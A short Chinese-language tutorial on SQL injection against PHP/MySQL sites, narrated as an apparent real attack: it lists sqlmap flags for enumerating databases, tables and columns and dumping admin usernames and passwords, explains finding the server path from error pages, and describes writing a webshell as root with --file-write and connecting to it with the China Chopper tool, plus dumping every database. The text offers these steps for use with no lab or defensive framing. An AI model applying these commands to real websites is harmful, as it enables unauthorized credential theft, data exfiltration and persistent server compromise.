SQL注入实战二之 PHP + MySql数据库注入
监测注入
仍然和ASP站监测注入一样,不过这里要说的是,在报错的页面上,你可能会发现爆出了站点的物理路径,如下图,后面你就知道有什么用了。
首要标识
需要数据库:-dbs
得到数据库名称,需要表:-D xxx -tables
得到表名需要段:-D xxx -T xxxx -columns
段内有admin ,password,需要值:-D xxx -T xxxx -C “admin,password” -dump
这里在爆数据库名时候,要记得MySQL有三个默认数据库名,即 mysql、test、information_schema 。成功爆出用户名和密码如下:
这里我没有找到后台路径,很是尴尬,于是就只能拿Shell爆库。
Root权限写shell
- 知道网站的物理路径,基于报错信息(如上文所说),phpinfo.php(最常用)等等。
- 有足够大的权限(可以用select …. from mysql.user测试),查看用户权限(–privileges)
- magic_quotes_gpc()=OFF 魔术方法开启之后 不能向服务器写文件,, 打开之后可以防止sql注入
–file-read 读取文件
–file-write 上传文件 用菜刀连上就OK了。
恍恍惚惚
最装逼的命令:–dump-all -v 0 导出所有数据库和表内的内容
–dump-all -exclude-sysdbs -v 0 只导出用户自己新建的数据库和表的内容
虽然只有一条记录,只要是该站点没有注册登录功能,心疼自己一秒。